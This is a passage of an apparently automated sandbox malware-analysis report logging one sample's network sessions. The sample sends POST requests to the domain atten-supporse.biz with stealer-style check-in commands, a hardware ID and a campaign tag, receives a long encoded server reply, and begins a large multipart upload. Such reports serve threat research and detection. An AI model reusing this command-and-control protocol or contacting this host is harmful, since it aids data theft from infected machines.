                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:44 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=0re1pp7f7mumcb6ml0j8udg1mt; expires=Fri, 04-Apr-2025 13:56:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LjH5srWN8o0ppcBClyQG3cZKYLYjAggXUm2yunrt%2FTvCZQyMrCOy0bUFHWupOMtT%2BZkDR1mKhM0tMG6ecpW0O3wrRIHTYBJ%2FpMP5cO%2BDcXxaYcrb6%2F0sBf8ImgMnwGvw9wOKUPY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ef7a273a8417ca5-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1818&min_rtt=1810&rtt_var=696&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2846&recv_bytes=20870&delivery_rate=1552365&cwnd=243&unsent_bytes=0&cid=dfaf77a78f8868c4&ts=940&x=0"
                                                                                                                                                                                                                                            2024-12-09 20:09:45 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                                                            2024-12-09 20:09:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            13192.168.2.649958104.21.48.14433504C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:09:46 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                            Host: atten-supporse.biz
                                                                                                                                                                                                                                            2024-12-09 20:09:46 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                                                            2024-12-09 20:09:47 UTC1030INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:47 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=bqa8kpqk5h7bb7fvut9r4bmpoa; expires=Fri, 04-Apr-2025 13:56:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZFhXKKxZ%2FZ1z1NRqfLE58OX6Qqzg4lrcvbwWhFe97XLvgtnXBRZ18Ybu6Z%2BP4gX%2Fi%2BYhSo%2BHZcxyLxIBIGt8ETxOYH6f%2BMGg3tuKFQfB6oAnFjn%2FDcZJ%2FnP%2F87RckEVqgi%2BVWyw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ef7a2851e7ef797-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1789&min_rtt=1748&rtt_var=685&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1670480&cwnd=151&unsent_bytes=0&cid=7b3968031f82cb03&ts=1032&x=0"
                                                                                                                                                                                                                                            2024-12-09 20:09:47 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                                                            2024-12-09 20:09:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            14192.168.2.649960104.21.48.14435440C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:09:47 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=X1G978EDH5J37MIT
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 1242
                                                                                                                                                                                                                                            Host: atten-supporse.biz
                                                                                                                                                                                                                                            2024-12-09 20:09:47 UTC1242OUTData Raw: 2d 2d 58 31 47 39 37 38 45 44 48 35 4a 33 37 4d 49 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 33 38 34 46 43 37 32 36 34 31 31 33 34 32 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 58 31 47 39 37 38 45 44 48 35 4a 33 37 4d 49 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 31 47 39 37 38 45 44 48 35 4a 33 37 4d 49 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                                                                                                                                                                                            Data Ascii: --X1G978EDH5J37MITContent-Disposition: form-data; name="hwid"3384FC726411342223D904AF30EFEBBC--X1G978EDH5J37MITContent-Disposition: form-data; name="pid"1--X1G978EDH5J37MITContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic
                                                                                                                                                                                                                                            2024-12-09 20:09:47 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:47 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=gbqtvlt0o4rl381f3v73qup7jb; expires=Fri, 04-Apr-2025 13:56:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mUzGFDupkAMs8Fuokgp6g1663FfUBec8j3FPwi0B%2F51kqiwFDLDnyMouamAh0TLVxDwRKYALNqed%2BcZvOYduEZnZ7pS5NGBaT8jXPaxMgBs%2BbwUdjuhlCl4rSM5FO%2B0bygPu6GM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ef7a28698e37ced-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1798&min_rtt=1794&rtt_var=682&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2159&delivery_rate=1594756&cwnd=179&unsent_bytes=0&cid=7b29a00f10f06dd8&ts=740&x=0"
                                                                                                                                                                                                                                            2024-12-09 20:09:47 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                                                            2024-12-09 20:09:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            15192.168.2.649967104.21.48.14433504C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:09:49 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 53
                                                                                                                                                                                                                                            Host: atten-supporse.biz
                                                                                                                                                                                                                                            2024-12-09 20:09:49 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                                                                            2024-12-09 20:09:49 UTC1017INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Mon, 09 Dec 2024 20:09:49 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=c4vctqumkuqvohd28hbs5fr744; expires=Fri, 04-Apr-2025 13:56:28 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c%2BQO4vNHpACPgMlDGiLXhGntITHZONbHkW%2F6CWyYfdUGcJaiRXJtRjeKBB7RLH5rMyHXNNkddZKQbdKoyWP1J1WLKzKp07zolC2kpJckJIdDPScJefkR0O%2BJ%2BpRT8JKODe2YWQQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ef7a2939c8d7ca5-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1804&min_rtt=1799&rtt_var=686&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=955&delivery_rate=1583514&cwnd=243&unsent_bytes=0&cid=130f608875dad530&ts=772&x=0"
                                                                                                                                                                                                                                            2024-12-09 20:09:49 UTC352INData Raw: 34 39 31 63 0d 0a 31 62 7a 42 77 33 6b 35 52 61 50 66 48 2b 2f 38 6f 49 70 44 79 4a 53 57 30 48 66 59 6b 63 52 36 43 53 67 62 33 32 35 37 30 78 75 75 6e 72 66 68 51 77 31 70 67 61 78 36 7a 63 62 55 2b 44 61 74 75 4c 53 78 45 2f 71 72 6f 68 74 6c 57 33 37 7a 54 41 32 2b 4f 65 2f 61 6f 4b 38 4b 58 47 6d 42 75 6d 66 4e 78 76 76 78 59 61 33 36 74 4f 70 56 76 66 75 6d 47 32 56 4b 65 72 51 42 43 37 39 34 76 64 43 6d 71 78 78 61 49 63 4b 7a 63 6f 71 5a 78 65 73 70 70 76 33 37 75 42 72 36 76 65 59 66 63 77 6f 68 2f 53 4d 65 70 33 71 59 33 62 4b 6f 57 30 52 70 32 50 31 36 67 64 36 61 71 43 4b 74 39 76 71 32 45 37 50 35 72 42 4a 74 53 33 2b 31 48 68 4b 31 63 37 33 65 70 61 6f 57 55 7a 58 50 75 58 57 42 6e 38 2f 72 59 65 53 32 38 36 70 56 34 72 50 31 4b 6d 68 62 61
                                                                                                                                                                                                                                            Data Ascii: 491c1bzBw3k5RaPfH+/8oIpDyJSW0HfYkcR6CSgb32570xuunrfhQw1pgax6zcbU+DatuLSxE/qrohtlW37zTA2+Oe/aoK8KXGmBumfNxvvxYa36tOpVvfumG2VKerQBC794vdCmqxxaIcKzcoqZxesppv37uBr6veYfcwoh/SMep3qY3bKoW0Rp2P16gd6aqCKt9vq2E7P5rBJtS3+1HhK1c73epaoWUzXPuXWBn8/rYeS286pV4rP1Kmhba
                                                                                                                                                                                                                                            2024-12-09 20:09:49 UTC1369INData Raw: 38 61 56 69 66 54 74 58 61 47 6d 39 44 6a 4b 4b 66 37 39 4c 38 66 74 66 43 6d 48 32 46 41 64 72 63 49 46 4c 78 2f 74 39 37 6a 37 31 74 63 50 34 48 6c 50 61 36 62 30 75 38 74 76 4c 54 4f 38 67 72 30 36 75 59 66 5a 77 6f 68 2f 51 51 63 73 6e 71 38 30 61 43 70 45 45 6b 6e 30 37 74 77 69 49 7a 45 37 53 2b 67 39 65 61 34 47 37 7a 77 72 78 4e 69 54 33 36 35 54 46 66 78 66 71 2b 65 2b 2b 45 36 56 69 7a 4e 74 32 71 4e 33 74 32 6d 4f 4f 72 78 2b 50 4a 4e 2b 76 65 6e 48 47 70 4f 64 37 4d 49 46 62 64 33 75 74 47 6c 71 78 74 63 4c 63 6d 31 66 49 43 56 7a 65 67 6b 70 2f 4c 79 76 68 53 2f 73 2b 68 59 62 46 49 35 35 55 77 33 74 6e 71 6c 6e 4a 61 69 46 56 55 67 31 2f 31 69 77 34 65 43 37 79 33 71 72 72 53 38 45 4c 58 68 70 77 70 75 52 47 75 78 43 52 2b 38 65 72 6e 65 70
                                                                                                                                                                                                                                            Data Ascii: 8aVifTtXaGm9DjKKf79L8ftfCmH2FAdrcIFLx/t97j71tcP4HlPa6b0u8tvLTO8gr06uYfZwoh/QQcsnq80aCpEEkn07twiIzE7S+g9ea4G7zwrxNiT365TFfxfq+e++E6VizNt2qN3t2mOOrx+PJN+venHGpOd7MIFbd3utGlqxtcLcm1fICVzegkp/LyvhS/s+hYbFI55Uw3tnqlnJaiFVUg1/1iw4eC7y3qrrS8ELXhpwpuRGuxCR+8ernep
                                                                                                                                                                                                                                            2024-12-09 20:09:49 UTC1369INData Raw: 67 31 2f 31 69 77 34 65 43 37 79 33 71 72 72 53 2f 48 62 2f 32 71 52 6c 68 52 48 79 33 41 42 47 2f 65 71 58 52 70 36 45 58 55 79 33 4d 73 33 6d 46 6c 38 6e 6a 4a 36 72 33 2f 76 4a 62 2b 76 53 2b 57 44 4d 4b 54 62 6f 41 46 4c 34 37 67 74 32 74 72 78 78 4e 5a 39 37 7a 5a 4d 32 5a 7a 71 68 35 36 76 72 39 73 68 36 77 39 36 59 66 5a 6b 39 36 75 67 38 55 74 6e 4f 35 32 61 65 74 45 6c 59 68 77 62 70 35 69 49 7a 48 34 53 32 6d 74 72 72 79 45 71 4b 7a 2f 6c 68 45 54 57 2b 2b 49 78 71 67 63 50 66 42 37 62 68 62 58 43 75 42 35 54 32 4b 6d 38 72 6a 4a 36 4c 32 35 72 63 62 73 66 4b 73 48 6d 70 48 64 62 73 4d 47 4c 46 2f 75 39 36 6b 70 67 6c 4a 49 73 65 76 64 38 33 51 67 75 38 35 36 71 36 30 68 41 57 74 34 72 42 61 58 6b 6c 33 73 77 73 50 38 57 62 35 78 2b 4f 6d 46 78
                                                                                                                                                                                                                                            Data Ascii: g1/1iw4eC7y3qrrS/Hb/2qRlhRHy3ABG/eqXRp6EXUy3Ms3mFl8njJ6r3/vJb+vS+WDMKTboAFL47gt2trxxNZ97zZM2Zzqh56vr9sh6w96YfZk96ug8UtnO52aetElYhwbp5iIzH4S2mtrryEqKz/lhETW++IxqgcPfB7bhbXCuB5T2Km8rjJ6L25rcbsfKsHmpHdbsMGLF/u96kpglJIsevd83Qgu856q60hAWt4rBaXkl3swsP8Wb5x+OmFx
                                                                                                                                                                                                                                            2024-12-09 20:09:49 UTC1369INData Raw: 63 34 43 56 7a 65 4d 7a 71 76 76 77 76 68 47 79 2b 4b 78 59 4a 51 70 2b 70 55 78 42 38 55 79 36 30 61 4f 69 44 52 73 34 6a 36 51 39 69 70 4b 43 73 47 47 6d 2b 50 53 39 47 62 62 34 72 68 6c 6e 52 48 36 34 42 52 47 35 61 37 62 61 71 36 41 56 56 43 62 46 75 48 69 4a 6d 63 62 75 4c 75 71 34 74 4c 55 4e 2b 71 76 6d 4e 30 78 2f 4f 35 77 32 57 61 34 33 72 70 36 6b 72 56 73 44 5a 38 32 2b 63 59 57 52 78 4f 45 74 6f 50 2f 2f 76 68 36 2b 2f 36 38 64 62 55 74 38 75 41 30 64 76 58 4f 78 33 61 43 75 46 46 51 76 67 66 4d 39 69 6f 61 43 73 47 47 50 34 66 2b 38 45 2f 72 73 36 41 45 72 54 58 58 39 56 46 6d 39 63 4c 48 59 70 71 30 61 58 53 2f 45 74 58 6d 4d 6d 4d 54 72 4c 71 37 7a 39 62 30 52 74 76 32 73 47 57 70 47 63 72 49 48 48 50 45 33 39 39 6d 37 34 55 4d 62 46 73 4b
                                                                                                                                                                                                                                            Data Ascii: c4CVzeMzqvvwvhGy+KxYJQp+pUxB8Uy60aOiDRs4j6Q9ipKCsGGm+PS9Gbb4rhlnRH64BRG5a7baq6AVVCbFuHiJmcbuLuq4tLUN+qvmN0x/O5w2Wa43rp6krVsDZ82+cYWRxOEtoP//vh6+/68dbUt8uA0dvXOx3aCuFFQvgfM9ioaCsGGP4f+8E/rs6AErTXX9VFm9cLHYpq0aXS/EtXmMmMTrLq7z9b0Rtv2sGWpGcrIHHPE399m74UMbFsK
                                                                                                                                                                                                                                            2024-12-09 20:09:49 UTC1369INData Raw: 63 33 6b 59 65 53 32 38 36 70 56 34 72 4f 49 45 33 68 64 65 72 4d 48 44 36 6f 35 71 4a 43 36 34 52 78 58 5a 35 6e 39 66 6f 61 56 78 75 67 74 71 76 4c 35 73 67 65 31 39 4b 45 52 59 46 68 7a 75 67 73 53 75 58 4b 34 32 4c 47 74 46 55 6b 69 30 36 38 39 77 39 37 46 38 47 48 79 74 73 4b 31 42 61 72 77 35 43 6c 39 53 57 2b 32 41 52 58 78 5a 76 6e 48 34 36 59 58 47 33 2b 42 75 33 4b 45 6e 63 33 70 4b 4b 62 37 38 62 73 51 75 2f 57 69 45 6d 46 4b 66 37 73 4e 48 4c 74 36 74 74 53 71 70 68 4e 63 4a 4e 50 39 4d 38 32 5a 32 71 68 35 36 74 2f 7a 6f 42 75 71 73 37 6c 57 63 67 70 2b 73 55 78 42 38 58 32 39 30 61 65 6d 46 31 30 69 78 37 42 38 67 70 2f 43 35 79 57 68 2f 2f 4b 7a 47 4c 2f 2b 6f 67 70 68 51 58 61 78 42 52 57 38 4f 66 6d 65 70 4c 6c 62 41 32 66 77 73 48 4f 44
                                                                                                                                                                                                                                            Data Ascii: c3kYeS286pV4rOIE3hderMHD6o5qJC64RxXZ5n9foaVxugtqvL5sge19KERYFhzugsSuXK42LGtFUki0689w97F8GHytsK1Barw5Cl9SW+2ARXxZvnH46YXG3+Bu3KEnc3pKKb78bsQu/WiEmFKf7sNHLt6ttSqphNcJNP9M82Z2qh56t/zoBuqs7lWcgp+sUxB8X290aemF10ix7B8gp/C5yWh//KzGL/+ogphQXaxBRW8OfmepLlbA2fwsHOD
                                                                                                                                                                                                                                            2024-12-09 20:09:49 UTC1369INData Raw: 75 68 38 2f 6d 2f 47 4c 6e 31 6f 42 4e 6e 57 48 43 39 44 78 4c 78 4e 2f 66 5a 75 2b 46 44 47 77 54 57 71 33 65 4b 6b 74 54 6a 49 4b 6e 67 2b 61 4a 56 39 4c 4f 33 48 33 6f 4b 49 61 73 63 44 72 5a 6d 2b 63 66 6a 70 68 63 62 66 34 47 37 64 49 75 5a 78 4f 59 7a 72 2f 44 37 76 52 79 7a 39 36 34 62 61 30 35 39 75 67 6b 61 76 58 4b 77 33 61 79 6c 45 6c 55 75 7a 76 30 7a 7a 5a 6e 61 71 48 6e 71 31 2b 2b 78 47 62 65 7a 75 56 5a 79 43 6e 36 78 54 45 48 78 64 62 6e 62 6f 36 73 64 58 79 4c 48 74 33 69 4e 6c 63 48 6e 4a 61 7a 79 2b 37 49 65 73 2f 4b 67 48 57 46 42 66 37 41 50 48 37 63 35 2b 5a 36 6b 75 56 73 44 5a 2b 47 6d 63 49 47 5a 67 76 64 76 73 37 62 7a 76 6c 58 69 73 36 30 55 62 30 31 35 73 41 38 52 74 48 32 39 32 36 4f 70 43 56 4d 6e 78 71 39 76 6a 5a 66 48 35
                                                                                                                                                                                                                                            Data Ascii: uh8/m/GLn1oBNnWHC9DxLxN/fZu+FDGwTWq3eKktTjIKng+aJV9LO3H3oKIascDrZm+cfjphcbf4G7dIuZxOYzr/D7vRyz964ba059ugkavXKw3aylElUuzv0zzZnaqHnq1++xGbezuVZyCn6xTEHxdbnbo6sdXyLHt3iNlcHnJazy+7Ies/KgHWFBf7APH7c5+Z6kuVsDZ+GmcIGZgvdvs7bzvlXis60Ub015sA8RtH2926OpCVMnxq9vjZfH5
                                                                                                                                                                                                                                            2024-12-09 20:09:49 UTC1369INData Raw: 30 6f 42 61 71 38 4b 6b 4a 56 51 6f 68 70 44 4a 5a 75 6d 2b 77 7a 71 43 33 45 46 59 72 30 49 4d 39 31 63 71 51 75 6e 50 34 70 4f 76 79 43 6f 57 39 35 68 6b 72 45 6b 43 6b 54 41 2f 78 49 65 57 51 34 37 4e 62 41 32 65 47 76 6d 2b 66 6d 4d 48 2b 49 75 33 49 79 70 55 44 73 50 53 32 48 33 78 46 4f 66 4e 4d 46 76 45 68 6a 70 36 71 70 67 42 4b 4d 63 79 74 65 73 32 68 6a 4b 67 35 36 71 36 30 68 78 61 30 2f 61 45 4f 65 67 64 65 71 77 59 65 6f 58 36 67 30 65 50 76 57 31 31 6e 6d 65 34 7a 7a 5a 72 54 71 48 6e 36 70 4b 2f 6e 52 75 32 6a 39 41 63 6c 55 7a 6d 72 54 45 48 6a 4e 2f 66 4d 34 2f 6c 62 48 43 54 54 72 33 75 4f 69 4d 47 76 48 35 54 52 37 72 38 54 72 65 4b 59 4a 6d 78 51 64 4c 73 62 43 50 31 73 74 4e 43 74 70 67 30 62 61 59 47 79 50 64 57 6e 67 71 42 68 6c 62
                                                                                                                                                                                                                                            Data Ascii: 0oBaq8KkJVQohpDJZum+wzqC3EFYr0IM91cqQunP4pOvyCoW95hkrEkCkTA/xIeWQ47NbA2eGvm+fmMH+Iu3IypUDsPS2H3xFOfNMFvEhjp6qpgBKMcytes2hjKg56q60hxa0/aEOegdeqwYeoX6g0ePvW11nme4zzZrTqHn6pK/nRu2j9AclUzmrTEHjN/fM4/lbHCTTr3uOiMGvH5TR7r8TreKYJmxQdLsbCP1stNCtpg0baYGyPdWngqBhlb
                                                                                                                                                                                                                                            2024-12-09 20:09:49 UTC1369INData Raw: 34 61 62 31 54 7a 73 59 5a 76 4d 56 57 61 63 35 37 34 7a 74 34 51 6b 62 66 34 48 36 66 70 2b 4d 78 4f 73 33 71 62 48 4b 6a 44 4b 30 39 4b 63 4f 65 31 31 32 67 7a 49 4d 73 6e 65 35 32 62 57 77 57 78 56 6e 7a 76 30 6c 74 4e 36 4b 71 42 37 6b 74 75 7a 79 54 66 72 47 70 52 5a 6c 54 57 2b 73 51 54 36 2f 66 72 62 49 73 37 59 55 47 32 6d 42 75 7a 33 56 7a 49 79 6f 4a 62 75 32 72 4f 4a 48 34 61 62 31 54 7a 73 59 5a 76 4d 56 57 61 63 35 37 34 7a 74 34 51 6b 62 66 34 48 36 66 70 2b 4d 78 4f 73 33 71 62 48 4b 6a 44 4b 30 39 4b 63 4f 65 31 31 32 38 69 49 76 6b 45 65 4a 79 36 43 76 46 56 77 78 30 50 30 7a 7a 5a 47 43 73 42 6a 71 76 72 53 4e 57 2f 72 72 35 6b 41 72 66 33 71 7a 41 68 36 6e 61 50 72 35 72 61 59 61 54 54 66 57 73 6a 4b 6a 71 4f 4f 6f 62 2b 72 77 74 4f 70
                                                                                                                                                                                                                                            Data Ascii: 4ab1TzsYZvMVWac574zt4Qkbf4H6fp+MxOs3qbHKjDK09KcOe112gzIMsne52bWwWxVnzv0ltN6KqB7ktuzyTfrGpRZlTW+sQT6/frbIs7YUG2mBuz3VzIyoJbu2rOJH4ab1TzsYZvMVWac574zt4Qkbf4H6fp+MxOs3qbHKjDK09KcOe1128iIvkEeJy6CvFVwx0P0zzZGCsBjqvrSNW/rr5kArf3qzAh6naPr5raYaTTfWsjKjqOOob+rwtOp
                                                                                                                                                                                                                                            2024-12-09 20:09:49 UTC1369INData Raw: 44 56 35 54 57 6d 2b 54 69 69 6e 65 72 66 51 70 4f 46 56 47 7a 2b 42 35 54 32 67 6a 4d 58 34 49 75 71 34 74 4c 35 56 34 72 4f 72 43 6d 78 61 65 76 45 4c 41 37 59 35 71 4a 43 36 34 51 30 62 66 35 4c 7a 50 5a 2f 65 6d 71 68 6d 70 50 76 31 73 52 75 35 34 62 51 65 61 46 78 36 2b 6a 49 6e 6e 47 75 77 7a 71 44 6a 4b 6c 59 6a 31 36 68 2b 6e 5a 6e 38 31 67 79 34 38 65 53 78 56 35 62 30 71 78 52 56 64 45 36 73 43 77 6e 7a 58 37 54 49 6f 4f 46 56 47 7a 2b 42 35 54 32 67 6a 4d 58 34 49 75 6a 61 38 37 38 5a 2b 75 7a 6f 41 53 74 63 4f 65 56 66 56 2f 46 72 39 34 62 6a 35 68 68 4a 4e 63 65 2b 61 34 37 5a 2f 4e 59 4d 75 50 48 6b 73 56 65 4c 2f 71 49 4f 66 6b 6c 70 75 6a 49 6e 6e 47 75 77 7a 71 44 6a 50 6d 46 6c 38 4b 74 2b 6a 5a 44 46 71 47 2f 71 37 72 54 71 56 5a 66 68
                                                                                                                                                                                                                                            Data Ascii: DV5TWm+TiinerfQpOFVGz+B5T2gjMX4Iuq4tL5V4rOrCmxaevELA7Y5qJC64Q0bf5LzPZ/emqhmpPv1sRu54bQeaFx6+jInnGuwzqDjKlYj16h+nZn81gy48eSxV5b0qxRVdE6sCwnzX7TIoOFVGz+B5T2gjMX4Iuja878Z+uzoAStcOeVfV/Fr94bj5hhJNce+a47Z/NYMuPHksVeL/qIOfklpujInnGuwzqDjPmFl8Kt+jZDFqG/q7rTqVZfh


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            16192.168.2.649973104.21.48.14435440C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-09 20:09:49 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=6K96DRPV2
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 565543
                                                                                                                                                                                                                                            Host: atten-supporse.biz
